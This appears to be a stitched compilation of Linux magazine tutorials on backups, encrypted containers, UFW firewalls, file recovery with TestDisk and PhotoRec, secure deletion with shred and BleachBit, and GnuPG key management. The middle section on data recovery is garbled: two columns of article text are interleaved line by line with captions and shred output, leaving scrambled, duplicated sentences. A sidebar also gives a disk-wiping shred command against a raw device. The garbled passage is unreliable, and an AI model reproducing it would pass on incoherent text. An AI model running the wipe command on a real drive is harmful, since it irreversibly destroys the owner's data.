While tools such as Deja Dup take the pain out of setting up the actual data backup process, a crucial part of the process is preparing for it. For starters you need to decide on a location for storing the backed up data. If you have multiple disks and a spare computer you can even set up your own Network Attached Storage (aka a NAS) device using software like OpenMediaVault. The kind of data you wish to back up also influences the choice of storage medium. You'll also need to work out the appropriate backup methodology. Do you want to back up manually or automatically based on a schedule? The correct backup frequency varies based on the kind and value of data being safeguarded. Depending on the size of the files, it might not be a good idea to back them up completely every day either.

> Deja Dup is based on Duplicity and provides just the right number of features for desktop users who aren't used to the ways of a backup tool.
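Because Deja Dup is a front-end to Duplicity, the same backups can also be driven from a script or a cron job. A minimal sketch follows; the paths, GPG key ID and server name are placeholders:
$ duplicity ~/Documents file:///media/backup/documents                      # first run is a full backup, later runs are incremental
$ duplicity --encrypt-key 0x12345678 ~/Documents sftp://me@nas.local//backups/documents   # encrypt with a GPG key and push off-site
$ duplicity restore file:///media/backup/documents ~/restored-documents     # pull everything back when disaster strikes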

Using zuluCrypt, you can create an encrypted disk within a file or within a non-system partition or USB disk. It can also encrypt individual files with GPG. ZuluCrypt has an intuitive user interface: you can use it to create random keyfiles and use these to encrypt the containers. The app also includes the zuluMount tool that can mount all encrypted volumes supported by zuluCrypt.

To install zuluCrypt head to http://mhogomchungu.github.io/zuluCrypt/ and scroll down the page to the binary packages section. The app is available as installable .deb package files for Debian and Ubuntu. Download the package for your distro and extract it with tar xf zuluCrypt*.tar.xz . Inside the extracted folder, switch to the folder corresponding to your architecture (i386 for older 32-bit machines and amd64 for new 64-bit ones). Both folders contain four binary packages that you can install in one go with the sudo dpkg -i *.deb command. On other distributions you'll have to install zuluCrypt manually. Download the app's tarball and follow the detailed steps in the included BUILD-INSTRUCTIONS file to fetch the dependencies from your distro's repos.
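The LUKS volumes that zuluCrypt works with are handled by the kernel's dm-crypt subsystem, so if you ever need to manage an encrypted container without the GUI, a roughly equivalent one can be built by hand with cryptsetup. This is only a sketch, with the file name and size chosen for the example:
$ fallocate -l 1G vault.img                          # reserve a 1GB file to act as the container
$ sudo cryptsetup luksFormat vault.img               # write the LUKS header and set a passphrase
$ sudo cryptsetup open vault.img vault               # unlock it as /dev/mapper/vault
$ sudo mkfs.ext4 /dev/mapper/vault                   # create a filesystem inside the container
$ sudo mount /dev/mapper/vault /mnt                  # use it like any other disk
$ sudo umount /mnt && sudo cryptsetup close vault    # lock it up again when you're done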
Put up a Firewall
Linux distributions come with the venerable netfilter/iptables framework. This framework is a set of kernel modules that can be utilised to create packet filtering rules at the kernel level. Ubuntu ships with an application called Uncomplicated FireWall (UFW), which is a userspace application that can be used to create iptables rules. There is also a GUI for UFW called Gufw. Gufw takes the pain out of managing iptables. The program can easily allow or block services as well as user-specified ports. You configure your policy based on pre-installed profiles for Home, Public and Office and set the policies for incoming and outgoing traffic. The default configuration should satisfy most users, but you can set individual rules if you wish for a more advanced configuration.

Begin by first enabling the firewall. Once enabled, you can set the Incoming and Outgoing policies by selecting one of the three options in the drop-down menus. The Allow option will allow traffic without asking any questions. The Deny option will silently discard all incoming or outgoing packets. The Reject option is different in that it sends an error packet to the sender of the incoming packets.

After you've set the policy for both Incoming and Outgoing traffic you can define specific rules for individual apps and services. To create a rule, click the Add button after expanding the Rules section. This opens a window that offers three tabs that enable the creation of rules in different ways. The Preconfigured option lets you select ready-made rules for specific apps or services, while the other two enable you to define rules for specific ports.

We'd suggest that most users should stick to the Preconfigured tab. All you need to do is select the app you wish to control traffic for from the drop-down menu and the app will automatically define the most effective rules. As mentioned earlier: for a secure system, you should drop all incoming and outgoing traffic and then selectively add rules for the apps and services that you use, such as the web browser, instant messaging and BitTorrent etc. ■
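Gufw is only a front-end: the same policy can be expressed with a handful of ufw commands, which is handy on machines without a desktop. The BitTorrent port shown below is just an example:
$ sudo ufw default deny incoming       # drop unsolicited inbound traffic
$ sudo ufw default allow outgoing
$ sudo ufw allow ssh                   # open individual services...
$ sudo ufw allow 51413/tcp             # ...or specific ports
$ sudo ufw enable
$ sudo ufw status verbose              # review the active rules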
Table 1. Access and user restrictions

Permission   Action      chmod option
read         view        r or 4
write        edit        w or 2
execute      execute     x or 1

User     ls -l output    chmod option
owner    -rwx------      u
group    ----rwx---      g
other    -------rwx      o


Data recovery and secure deletion
Mike Bedford investigates recovering files from damaged disks and how to make sure that what you delete is gone for good.

Increasingly, one of the most valuable commodities is information. But this isn't just for big business - most of us have data that is valuable in one way or another. So, preserving that data is important, because the consequences of failing to do so can range from inconvenience to financial hardship. And as we're all well aware, there can also be severe consequences if our data falls into the wrong hands. Here we address the two inter-related themes of data recovery following accidental deletion or hard disk failure, and secure deletion so that, when you do delete data, nobody else can recover it. Mostly we're considering traditional magnetic hard disks, but we also look at the different challenges that apply to SSDs (see Solid-State Drives boxout below).

Mike Bedford has been the victim of a disk crash, so is all too aware of the anguish of losing important data.

> SSDs look different from magnetic hard disks and the challenges they pose for file recovery and secure deletion are markedly different, too. CREDIT: Dmitry Nosachev, CC BY-SA 4.0, via Wikimedia Commons.
are markedly different, too.
boxout below).

Check your bin!
Sometimes the obvious gets overlooked: that obvious measure is to restore the file from the Rubbish Bin (Trash if the language is set to American English), the special folder that stores files that have been deleted. Do bear it in mind. After all, magically restoring your friend's files might just promote you to hero status. If you deleted a file using the rm (remove) command in the terminal, that file will have been genuinely deleted, as opposed to being dispatched to the Rubbish Bin, so the trivially simple method of recovering the file won't work. If the file was deleted in the file manager - as will almost certainly be the case with your non-technically minded friend - there's a good chance it's residing in the Rubbish Bin. Certainly, that is what happens if you select a file and hit the Delete key, although Shift+Delete bypasses the Rubbish Bin. It's also possible, permissions depending, to delete a file or send it to the Rubbish Bin by selecting the appropriate option having right-clicked on a file.

Solid-State Drives
Most of the techniques discussed throughout this article don't apply to SSDs, and both recovering deleted files and secure deletion are either impossible, unnecessary or significantly more difficult because of several things that happen, internal to the SSD, that the PC is totally unaware of.

The first concerns what happens when a file is deleted, and it relates to how the space it occupied will eventually be reused. Unlike a magnetic disk, the flash memory in an SSD can't just be overwritten. First it has to be erased, which is a function of the flash memory chips, and is not the same as overwriting with zeros, for example. This takes time, so the SSD erases unused space as a background process, so that writing new files isn't slowed down unnecessarily. It probably won't happen immediately, but when the data is eventually erased, there's no possibility of recovering the file. That's the bad news; the good news is that secure deletion isn't necessary.

Then there's wear levelling. Because flash memory can't be written to as many times as magnetic memory - 1,000 to 100,000 times, depending on the tech - the SSD moves blocks of data around, as a background process, to avoid any blocks of memory being over-used. Although the SSD's firmware keeps track of this, it doesn't provide the PC with this information. So, even if parts of a deleted file haven't yet been erased, file recovery software won't know where the remnants of the file are.

So how do you recover 'permanently' deleted files? We put that word in quotes because, although it's often thought of as such, files can still often be recovered. That's because, when a file is deleted, the data it contained isn't actually deleted - in the sense of it being overwritten with zeros or ones - but, instead, the reference to the file in the filesystem is marked as deleted, with the result that the space it occupied on the disk becomes available for reuse. Sounds like deleted files ought to be recoverable, therefore, and while that is often true, some guidance is called for.

Here we're going to consider the worst case scenario of not noticing immediately that you've used the rm command inadvisably. If you do notice immediately, though, other options might be available to you if the file is still open in some application. We're going to be looking at some tools that enable you to recover deleted files, but first we have some important advice. Remember that deleting a file makes the space it occupied available for reuse. If your disk is large enough, and has enough free space, it's quite possible that the data in your deleted file will remain untouched for a considerable time, but there are no guarantees, so avoid saving files to disk. This includes installing new software, of course, so do make sure you have the necessary tools for undeletion installed on your PC before you need them, although several such tools are pre-installed on some distros. Remember also that background processes can write to disk, so if you just avoid saving files yourself, you might still lose any chance of recovery. The safest thing to do, therefore, is to close down your system as soon as you notice your error and then start it from a bootable CD or USB drive to attempt recovery. Needless to say, this means you need to be prepared. You could do worse than using the Ultimate Boot CD (www.ultimatebootcd.com), which is available as a download in ISO format and, in addition to the operating system, has diagnostic and data recovery tools already installed.

First of all, we'll take a look at TestDisk. It's pre-installed with some distros, but not all, so check before you need it, and install it if necessary. It's a command-line utility and, for best results, you should use it with sudo access. Although our emphasis here is on recovering deleted files, because that's surely the most commonly needed data recovery function, TestDisk's capabilities go far beyond that. So, if you find yourself in the unenviable but, hopefully, unlikely position of having accidentally deleted a disk partition, TestDisk can probably come to the rescue here, too.

But there's a snag if you want to restore a deleted file from a disk with the ext4 filesystem, which is the one you'll find used in most Linux systems, or its predecessor ext3. Unlike many other filesystems, when a file is deleted in ext4 or ext3, the pointer that shows where the deleted file's data started on the disk is deleted. This would make undeletion by the normal method impossible; indeed, the user documentation doesn't list ext4 as one of its supported filesystems. Bizarrely, we've seen several reports of people claiming to have used TestDisk to restore deleted data on an ext4 or ext3 disk, but we remain sceptical, and our experience is that you can't. However, we were able to use it to restore deleted files from a USB flash drive, and the same will be true of memory cards, because they use the supported FAT file system.

We're not going to give a blow-by-blow account of how to recover deleted files using TestDisk, but if you get stuck, the user manual seems comprehensive. We should point out that the interface is wordy, but we're confident you'll soon get the hang of it.

> TestDisk doesn't work with the ext3 or ext4 filesystems but, as the red files listed here prove, it works on FAT devices such as USB flash drives.
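Starting TestDisk is simply a matter of pointing it at the right device (or at a disk image); the device name below is only an example, so check yours first:
$ lsblk                       # identify the disk or partition holding the deleted files
$ sudo testdisk /dev/sdb      # launch TestDisk against that device
On its first screen TestDisk will offer to write a log file to the current directory, which is worth accepting if you may need to retrace your steps.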

The first few menus are fairly obvious, but when you get to a screen with options starting with Analyse, Advanced and Geometry, select Advanced. Then, on the next screen, select your partition and choose the List or Undelete option, if available. You can now navigate through the folders in that partition. Any deleted files are shown in red and are candidates for recovery. Do remember, though, for the same reason that you need to avoid writing to your disk as soon as you notice an accidental deletion, don't attempt to write your recovered files on to the same disk partition as the one that contained the lost files. Use a different partition or disk, perhaps a USB memory stick, otherwise the first file you recover might be your last.

> PhotoRec uses a different approach from the likes of TestDisk for file recovery. However, be sure to only select the file types you're interested in, otherwise it takes for ever.

Some say that secure deletion can't be guaranteed to keep a file from prying eyes with the ext4 filesystem because, like all journaling filesystems, there might be a copy of the file, or segments of it, in the journal. However, you can take comfort from the fact that, by default, only metadata is written to the journal.

Because TestDisk won't do the trick, we need to consider how to restore deleted files under ext4 or ext3. One option is extundelete.
to the journal.
file types you’re interested in, otherwise it takes for ever. way from TestDisk, attempting to extract the

It works in a different way from TestDisk, attempting to extract the necessary information from the filesystem's journal, but we're not going to concentrate on that here, because there is arguably a better way, as you can see in the next section.
TestDisk might be a powerful utility but, quite apart
out of jail free'card, shred: P6079921.jpg: pass 7/11 (555555)..
should you decide from its lack of support for ext4 and ext3, its ability to shred: P6079921.jpg: pass 8/11 ।(ffffff)..
shred: P6079921.jpg: pass 9/11 I(249249)..
you need it after all. undelete files on any supported filesystem relies on
shred: P6079921.jpg: pass 16/11 (random).
However, critics say that filesystem still being intact. If that isn’t the case - shred: P6079921.jpg: pass (000600).
it leaves you open to although we can take comfort from the fact that a
shred: P6079921.jpg: removing
shred: P6079921.jpg: renamed to 060666066660
being coerced into
corrupted filesystem is a rare occurrence - we need shred: 066660660666: renamed to 00606000060
revealing the key. shred: 00000060000: renamed to 0060060060
should you inhabit to employ some of the techniques used in digital shred: 6606006006: renamed to 666666600
some shady twilight forensics. The same techniques can also be used shred: 660666600: renamed to 00000000
shred: 00000066: renamed to 0006006
world, that is. with ext4 or ext3, even if TestDisk drew a blank. shred: 0060600: renamed to 000000
In these instances, instead of just reversing the shred: 000000: renamed to 00000
shred: 06606: renamed to 6666
deletion process, it’s necessary to search the disk shred: 6606: renamed to 606
for fragments of files and reassemble them using a shred: 006: renamed to 60
shred: 66: renamed to 6
detailed knowledge of the structure of particular file shred: P6679921.jpg:
___________ Jr„. removed
mtkegHtke-PC:-/Photos$ |
formats. Data recovery companies offer such a service,
but at a not-insignificant cost, so it’s fortunate that
> Shred makes your deleted files unrecoverable but,
there’s a companion program to TestDisk, which is depending on which flags you use, it makes a meal of it.
installed at the same time as it, called PhotoRec.
As the name suggests, its particular forte is photo
files such as JPEGs, but it actually supports over When PhotoRec has finished, the location you chose
480 different formats, including just about every for the recovered files will have been populated by
conceivable graphics format, movies, audio files and several folders with names starting with recup_dir, and
even LibreOffice documents and much more. It’s fairly each of these contains many recovered files. But
straightforward, so we’ll leave you to experiment with it, there’s a snag. PhotoRec can’t recover the names
but we do need to mention one important fact that of the files it restores. They all have meaningless
might get overlooked. filenames, so it won’t necessarily be easy to find the
One of the menus asks you to select a disk partition ones you need. If you view them in the file manager, of
to search but, having selected that, before moving on, course, depending on what option you select, you
be sure to highlight File Opt and press Enter. This should be able to find your files by scanning through
takes you to a menu that asks which file types you want the thumbnails. However, even this might be time­
it to search for and, by default, they're all selected. consuming, depending on how many files PhotoRec
Generally, you press S to deselect all the file types and recovered. And with TXT files, to give just one example,
then, having highlighted each type you’re interested in, you’re only going to discover your prize by opening
select it using the right arrow key. Because reducing them one at a time - possibly from a list of hundreds
the number of formats being searched for has massive or thousands - until you find the one you want.
speed benefits - in our tests, while searching for all file A corrupted filesystem might be a lot worse than an
types would have taken hours, this reduced it to 15 accidentally deleted file but, unfortunately, things can
minutes for JPEGs only - make sure you only choose get worse - a lot worse. If you’ve ever heard your hard
the types you’re interested in. disk making scratching sounds or continually clicking,

Big-Time Secure Deletion


Despite our look at secure deletion, and coming to the conclusion that overwriting data multiple times isn't really necessary, some organisations remain to be convinced that any software solution could ever be adequate, and specialist companies are all too happy to pander to that concern. To be less condescending, we do admit that using the services of an accredited data destruction company might be necessary to prove compliance with data protection legislation. The first method of data destruction, and the one that's most similar to software-based overwriting, involves using a degausser. This is a machine that subjects the whole disk drive, working or not, to a massively powerful magnetic pulse that instantaneously destroys any data on the platter. Apart from the benefit of using an accredited service, this is so much quicker than wiping an entire disk by overwriting it with random data.
If degaussing sounds like the ultimate solution, wait until we move on to look at disk destruction services. And we mean just that - totally and utterly destroying the disk. The Linux shred command shreds data in a conceptual way, but some secure deletion companies literally shred disks. Think of a massive, industrial-scale document shredder and you'll get the picture. And the end result is little more than metallic confetti. If that's not for you, but you're still concerned about disposing of an old PC, the photo might give you some inspiration.
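If the do-it-yourself route is good enough for you, the wiping-by-overwriting approach mentioned here can be done with the same shred command covered in the main article; a rough sketch only - the device name /dev/sdX is a placeholder, and overwriting the wrong drive is irreversible, so triple-check it first:
$ sudo shred -v -n 1 /dev/sdX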

while refusing to do anything useful, it's a memory that will stay with you for quite some time. This, of course, is a disk crash. It might be that the head has come into contact with the platter - never a good thing, and that's an understatement - or perhaps the on-drive electronics have failed. In either case, there's little you can do to resolve the situation (potentially you can source replacement board electronics from eBay if that's the issue) except call in the experts. It's not going to be cheap, but many data recovery companies diagnose the problem for free, and you only pay a recovery fee if that diagnosis suggests they'll be able to revive your disk.

Secure deletion
We've seen that accidentally deleting a file doesn't necessarily mean game over, but there's a corollary to this. If you deliberately delete a file, should your PC or media fall into the wrong hands, or if you have to share your PC with other people, the same methods could be used by that third party to resurrect your deleted data. Probably of more concern is being able to safely dispose of an old PC. If the content of any deleted files is sensitive, therefore, you'll want to take every means possible to ensure that it can't be recovered.

If you want to safely dispose of a CD or DVD, just snap it in two, having first wrapped it in cloth to protect your eyes from shrapnel. Although some document shredders can handle optical disks, it wears them out more quickly and is totally unnecessary. After all, trying to retrieve data from a broken disk would be hugely expensive and only partially successful.

We started this article with the obvious, and the subject of the Rubbish Bin is equally relevant here. If you want to make sure your deleted files stay that way, don't just transfer them to the Rubbish Bin. As we know, that alone isn't enough to prevent them from making a comeback, and this brings us to the subject of secure deletion. Deleting a file ordinarily doesn't delete it, but secure deletion utilities do exactly that by overwriting the entire contents of that file with other data. Using the command shred in place of rm overwrites the file, and if you use the -u flag, it deletes it afterwards. By default, it overwrites the file three times with random data, although you can increase this using the -n flag. That's surely enough - in fact, you might think it's more than enough - which raises the question of why it overwrites the data multiple times. In fact, it also takes us into the strange world of secure deletion utilities trying to outdo each other in how many times the data is overwritten and how.
The commonly cited answer lies in the fact that, when a bit is overwritten on a magnetic disk, it's possible that the resulting magnetic density will depend, to a degree, on what was written there previously. Putting it simply, it's suggested that overwriting a 0 with a 1 results in a slightly different magnetisation from overwriting a 1 with a 1. So, if you measure the magnetism of all the bits in an overwritten file, and subtract the magnetism associated with the current data, you're left with the magnetism associated with the previous data, and can convert these weak signals to a string of 0s and 1s. And, so the argument goes, you can do this for any number of overwritings, even though you end up with an increasingly small signal that, at some point, will get lost in the noise.
The snag with the argument is that you can't do this using the normal hardware of a magnetic disk drive because it's designed to output just 0s and 1s, not the analogue value of the magnetism. Instead, you'd need to transfer the disk platter to some specialist and very expensive hardware, which takes us from the realm of opportunist criminals to the sole domain of the military and, perhaps, police involved in anti-terrorism. This begs the question of whether the technique is ever used, if the stakes are large enough. Of course, we'll probably never know, but it's interesting to note a conversation we had with a highly experienced specialist who worked for one of the major hard disk manufacturers. The bottom line is that he was not aware of the technique ever having been used successfully. It's probably a fair bet, therefore, that the 'meagre' default three times that shred overwrites your data won't leave you with sleepless nights as you ponder over the security of your deleted data.
As a parting shot, we'll introduce you to BleachBit (www.bleachbit.org), which is a GUI secure deletion package. With shred being so easy to use, you might wonder what the point is of going to an all-singing, all-dancing GUI tool, and the answer is that it does a lot more than just shred files. Most fundamentally, it securely deletes specified files, and it does the same with folders, although interestingly, in the light of our previous discussion, it overwrites data with just a single pass, favouring speed over unnecessary multiple passes. As a major step beyond shred, BleachBit also overwrites all unused space on your disk. This means that it can securely delete files that have already been deleted, something that shred can't do. Bear in mind, though, that this isn't a quick process. In addition, BleachBit offers the option of removing a whole load of files that you haven't specifically written yourself - for example, temporary files or browsing history, which might contain sensitive information. You can, of course, delete this sort of data elsewhere - for example, you can delete browsing history in the browser - but BleachBit offers a couple of advantages. First, it's a one-stop shop, so you can manage all your temporary file deletion requirements from a single place. And, on top of that, unsurprisingly, BleachBit can not only delete this unwanted data, but it can do so securely.

> BleachBit offers secure deletion of files, overwriting of unused disk space and a whole lot more.
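To put the shred options mentioned above into practice, here's a minimal sketch - the filename is just an example, and the optional -z flag adds a final pass of zeros to disguise the shredding:
$ shred -v -n 3 -z -u secret-report.odt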


GnuPG: Key
Management
Your GnuPG key is your precious. We explain how to create a good one
and how to keep it safe from online thieves.

> The SKS Keyservers are one of a number of public keyservers with an interactive web interface where you can upload your key or search for other people's.

GnuPG, the "Gnu Privacy Guard", is a privacy tool you can use to encrypt email or verify the authenticity of software packages before installing them. It's an implementation of the OpenPGP standard that relies on public-key cryptography keys that have provable authenticity through certification and trust.
The GnuPG documentation explains early-on that good key management is essential. So, in this tutorial, we will focus on key management and explore best-practice with that aim in mind. We're using GnuPG version 2.1, nicknamed "Modern".

Some basics
A GnuPG key has public and private components referred to individually as a public key and private key, and together as a key-pair. Private keys are used for signing and decryption, and public keys are used for signature verification and encryption. Public keys are contained in "certificates" along with identifying information (a user id which may be a name, email address or, perhaps, a photograph) plus one or more dependent "subkeys" that enable separate keys for signing and encryption. The rationale behind subkeys lies in GnuPG's development history and current security-related concerns. An individual using GnuPG collects other people's public keys, possibly obtaining a certificate from a key server, along with their own key-pairs in their GnuPG keyring. Depending on context, 'key' can mean key-pair, private key, public key, subkey or certificate.
We'll explore these concepts as a hypothetical new user who can't wait to start encrypting everything. Let's create that user now, something like this:
$ sudo useradd -m alice
$ sudo -i -u alice

Use gpg --full-gen-key if you want to interactively choose key type, cipher algorithm and key size when creating a new key.

Set your preferences
The first thing to do is configure GnuPG. It uses a directory (~/.gnupg by default) to store its configuration, runtime information and the keyring. It can create this directory automatically, but manually creating it enables us to specify some preferences before using GnuPG for the first time. Do so, using restricted access permissions to secure it:
$ mkdir -m 700 ~/.gnupg
Although optional (GnuPG assumes a default configuration), writing a configuration file allows us to set some parameters to customise personal preference:
# ~/.gnupg/gpg.conf
keyserver hkps://hkps.pool.sks-keyservers.net


personal-cipher-preferences AES256 AES192 AES CAST5
personal-digest-preferences SHA512 SHA384 SHA256 SHA224
cert-digest-algo SHA512
default-preference-list SHA512 SHA384 SHA256 SHA224 AES256 AES192 AES CAST5 ZLIB BZIP2 ZIP Uncompressed
This configuration example sets the default key server from where public key certificates can be obtained and states preferred cipher and digest (hashing) algorithms. The default-preference-list defines those preferences that will be included when generating new keys so that third parties using them know what we would prefer them to use. Together, these preferences control the available algorithms that GnuPG may use and, as an example, we express our preference for more secure ones. The default algorithms, however, are suitable for most use-cases should you prefer to stick with them.
The easiest way to create a key is to enter gpg --gen-key and follow the prompts that request name, email address and a passphrase. This method uses default settings (including those from the configuration file) and would produce a non-expiring 2048-bit "primary", or "master", RSA key for signing and certification, a user id formed from the given name and email, and a subkey (also 2048-bit RSA) for encryption.
Another approach is to use GnuPG's batch mode because it allows the required information to be provided in a parameter file instead of prompting for it to be entered interactively. The parameter file allows more detailed configuration than the interactive tool and also serves as a record of the parameters used to generate the key.
$ cat <<EOF > alice.keyparams
Key-Type: RSA
Key-Length: 4096
Key-Usage: sign
Subkey-Type: RSA
Subkey-Length: 4096
Subkey-Usage: encrypt
Name-Real: Alice
Name-Email: alice@example.org
Passphrase: alice1234
Expire-Date: 1y
EOF
$ gpg --verbose --gen-key --batch alice.keyparams
The key generation may take a little while because it requires "entropy" to provide sufficient random data: the verbose option asks gpg for progress feedback.

The haveged (www.issihosts.com/haveged) utility can help provide the entropy required for key generation. Check your distro's package repository.

Our example generates larger 4096-bit keys (just to illustrate the capability; 2048-bit keys are secure for most purposes) that will expire one year after creation. An expired key is invalid and cannot be used to sign or encrypt, and setting a date when this should occur is a precautionary measure that doesn't hurt but would be beneficial in the event that the private key or its passphrase were ever lost. In such cases where a key cannot be revoked it is of some comfort to know that it will expire at some point. Should the worst not happen, the expiry date can be changed, even if the key has already expired. Note that expired keys can still decrypt already encrypted messages.
The example parameter file includes the passphrase but gpg will prompt for it interactively if it is omitted from the file. Other options may be given, such as "preferences", which would override the default preference list in gpg.conf.
The user id consists of the given name ("Name-Real"), email ("Name-Email") and an optional comment ("Name-Comment") that we didn't use. Popular opinion in the PGP community recommends against using comments because they are not part of your identity. Bear in mind that you can't change a user id but you can revoke them and add new ones.

And the key is...
Once key generation completes, gpg can display a summary of what was produced with its --list-keys (or -k) command:
$ gpg -k alice
pub rsa4096 2016-10-03 [SC] [expires: 2017-10-03]
      109FB60CAD48C7820CF441A661EB6F7F34CE2E54
uid [ultimate] Alice <alice@example.org>
sub rsa4096 2016-10-03 [E] [expires: 2017-10-03]
This shows three things: a 4096-bit primary key, the user id and a subkey. The [ultimate] annotation on the user id reflects trust in yourself (it's your key) and means your key is valid and you will trust any other keys you sign with it.
The long string of hexadecimal characters is the primary key's "fingerprint", a 160-bit SHA1 hash of the key material. The pub prefix to the primary key tells you that you're looking at the public key; the sub prefix conveys similar meaning for the subkey. The two corresponding private keys aren't listed, but also exist in the newly created keyring (that is stored within the ~/.gnupg directory). Use gpg --list-secret-keys (or its short-form -K) to list them (see over): »

You can add frequently used formatting options to gpg.conf. Just leave off the leading double-hyphen.

> Paperkey's output can be used to recover your secret key.
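As an aside, the expiry date mentioned above is changed from gpg's key-editing mode; a minimal sketch using our example key, with the new validity period chosen at the interactive prompt:
$ gpg --edit-key alice
gpg> expire
gpg> save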

keygen, pinentry, su, sudo and tty


GnuPG uses a gpg-agent daemon to manage keys for gpg and this uses a pinentry helper tool whenever it requires interactive passphrase input. For this to work properly, your shell's tty device must be owned by you (eg, for Alice, stat -c %U $(tty) must be alice). This won't be the case if you used sudo or su, and this may cause problems with tasks such as key generation that require access to secret keys: you might see an error like this:
gpg: agent_genkey failed: Permission denied
If this happens to you, try this little trick that takes advantage of the script command to do the key generation in a tty that you own:
$ script -q -c "gpg ..." /dev/null
where the command you wish to use, plus all of its arguments, are contained within the quotation marks. Alternatively, you can use gpg --pinentry-mode loopback to use a command-line passphrase prompt instead of the pinentry dialogue. Or, before the sudo or su:
$ sudo chown alice $(tty)
You may also need to perform export GPG_TTY=$(tty).


$ gpg -K
sec rsa4096 2016-10-03 [SC] [expires: 2017-10-03]
      109FB60CAD48C7820CF441A661EB6F7F34CE2E54
uid [ultimate] Alice <alice@example.org>
ssb rsa4096 2016-10-03 [E] [expires: 2017-10-03]
Here, in otherwise similar output, the prefixes are sec (secret) for the primary private key and ssb for the subkey.
The key's fingerprint is the primary way to identify it but they are usually referred to using a shorter key id of the last eight characters of the fingerprint. These short key ids are prone to collision, so a longer key id of 64 bits (the last 16 characters) can be used instead. They're still collision-prone, but to a lesser extent; if in doubt, use the fingerprint!

Check your repositories or search the web for paperkey, ssss or libgfshare.

Add --keyid-format short to gpg commands to request they output the short key format, or --keyid-format long for the longer one. If you use --fingerprint the fingerprint will be displayed in a more readable form. Like this:
> short "34CE2E54"
> long "61EB6F7F34CE2E54"
> fingerprint "109F B60C AD48 C782 0CF4 41A6 61EB 6F7F 34CE 2E54"
The fingerprint of the subkey is not displayed unless --fingerprint is given twice.
Our new key is "self-certified" which means the primary key signs the user id and subkey parts to assert that it owns them. You can view these signatures:
$ gpg --list-sigs alice
pub rsa4096 2016-10-03 [SC] [expires: 2017-10-03]
uid [ultimate] Alice <alice@example.org>
sig 3 61EB6F7F34CE2E54 2015-10-03 Alice <alice@example.org>
sub rsa4096 2016-10-03 [E] [expires: 2017-10-03]
sig 61EB6F7F34CE2E54 2016-10-03 Alice <alice@example.org>
Signatures are listed beneath the thing they are associated with. The display shows two signatures: one for the user id and the other for the subkey.
The two "sig" lines shown above display the signing key id, date and user id. The space after the "sig" may contain flags such as the "3" displayed on the primary key's signature which indicates the effort made when verifying a key. GnuPG assigns 3, the highest level, to the signatures it makes during the key generation.

You can peer inside a keyring or export file with gpg --list-packets to view its internal OpenPGP data; it's documented by RFC4880 (tools.ietf.org/html/rfc4880).

In addition to the self-certification signatures added by GnuPG, third parties may also sign the uid entries on your key to assert their confidence that the key and user id belong together and to you. Such signatures strengthen your key and help you build your web of trust.
So that's the basic key set up and signed and ready for use. You can use it as it is, but think about what it would mean if it was lost: a key in the wrong hands can be used to masquerade as you, signing documents in your name and reading documents encrypted for your eyes only.
You increase the risk of this happening by installing your key on many devices, especially devices such as laptops, phones or tablets which are frequently taken to public places where they are easily stolen, left behind or otherwise lost.

Key perfection
It would be better to not install your key on such devices in the first place. However, that isn't practical if you need to sign and encrypt on them. You can, however, use subkeys to help reduce and contain that risk because they have the fortunate property that they can be separated from the primary key, allowing it to be secured offline, and they can expire or be revoked independently.
You can create an additional signing-only subkey so that you have two: one for signing and another for encryption. You then detach those subkeys from the master key and only install the subkeys on your everyday devices. Thus:
$ gpg --edit-key alice
gpg> addkey
The interactive interface requires selection of key type, usage (ie, signing, encryption), length (bits) and duration (validity period) which may be non-expiring or specified in days, weeks, months or years.
If you wish, you can give the subkeys a passphrase that is different from the primary key. You can either do this while in edit mode or you can do it directly:
$ gpg --passwd alice
Regardless of the method chosen, GnuPG iterates through all keys but you can decline those you don't want to alter: there is no way to specify a single key.
Once you have your subkeys, you should export them without the primary key:
$ gpg --export-secret-subkeys alice > subkeys.gpg
GnuPG will prompt for the passphrase before exporting the subkeys. You can then use a temporary keyring to review what was exported:
$ mkdir -m 700 .gnupg-temp
$ gpg --homedir .gnupg-temp --import subkeys.gpg
$ gpg --homedir .gnupg-temp -K
sec# rsa4096 2016-10-04 [SC] [expires: 2017-10-04]
ssb rsa4096 2016-10-04 [E] [expires: 2017-10-04]
ssb rsa2048 2016-10-04 [S] [expires: 2017-04-02]
The --homedir tells GnuPG to use a specific directory (which can have any name but must pre-exist) instead of ~/.gnupg. The hash mark following the sec tag indicates that the secret key is absent from this keyring; only the secret subkeys are present. The annotations show that the subkeys can encrypt ("E") and sign ("S") data and that the primary key can both sign data and certify ("C") other keys.
You can remove the temporary keyring once you've finished using it. Stop its daemon, then remove the directory:
$ gpg-connect-agent --homedir .gnupg-temp KILLAGENT /bye
$ rm -r .gnupg-temp
Making a temporary keyring is straightforward and easily done whenever you need to work on your keys. A single pair of subkeys is sufficient for everyday use on all your devices,

Cross certification
There is a vulnerability where a public subkey could be attached to another certificate whose owner could then claim to have signed a document. To prevent such a scenario occurring, GnuPG now checks that signing keys are cross-certified before verifying signatures. Cross certification requires that subkeys sign the primary key to prove their authenticity. These "back" or "binding" signatures are embedded within the self-certification signatures that GnuPG adds to the signing subkeys - you can't see them with --list-sigs.
Older versions of GnuPG or other OpenPGP applications may not have this feature and signing subkeys generated with these applications may lack the required binding signatures. Owners of such keys can resolve this with the cross-certify command available in the key editing mode of the latest gpg. You can read the official explanation at www.gnupg.org/faq/subkey-cross-certify.html.
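If you do have an older key that lacks the binding signatures, the fix mentioned here is a one-liner in edit mode; a minimal sketch with our example key:
$ gpg --edit-key alice
gpg> cross-certify
gpg> save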


but you could generate them per-device if you wanted to protect against loss of a single device. Repeat the steps to create as many additional signing subkeys as you need, but it's best to use the same encryption key on all devices otherwise anyone wishing to send you encrypted material would not know which encryption key to choose (they send to you, not to your phone, tablet or laptop). If you have made device-specific subkeys then you can use a temporary keyring to separate them into per-device key files. You import your subkeys and delete the unwanted ones (which remain safe within the imported file) and then export as before, but into a new file. Recall that each device needs two secret keys: the shared encryption subkey and the device-specific signing key. Use edit mode to select and delete all other subkeys:
$ gpg --homedir .gnupg-temp --import subkeys.gpg
$ gpg --homedir .gnupg-temp --edit-key alice
gpg> key 3
gpg> delkey
gpg> save
$ gpg --homedir .gnupg-temp --export-secret-subkeys > device1-keys.gpg
Reload the subkeys and repeat the process for each device you want to export keys for.
It's a good precaution to keep your primary key offline, ideally by creating it on a secure computer that is protected from the tainted internet (perhaps also your slightly-less tainted local network). One way to do this is to use Tails Linux and keep your keyring in its secure persistent volume. See https://tails.boum.org/doc/first_steps/persistence for more information about this.

> Tails Linux can be used to keep your keyring secure.

Tails Linux (tails.boum.org) makes an ideal offline key manager when you store your keyring in its persistent volume.

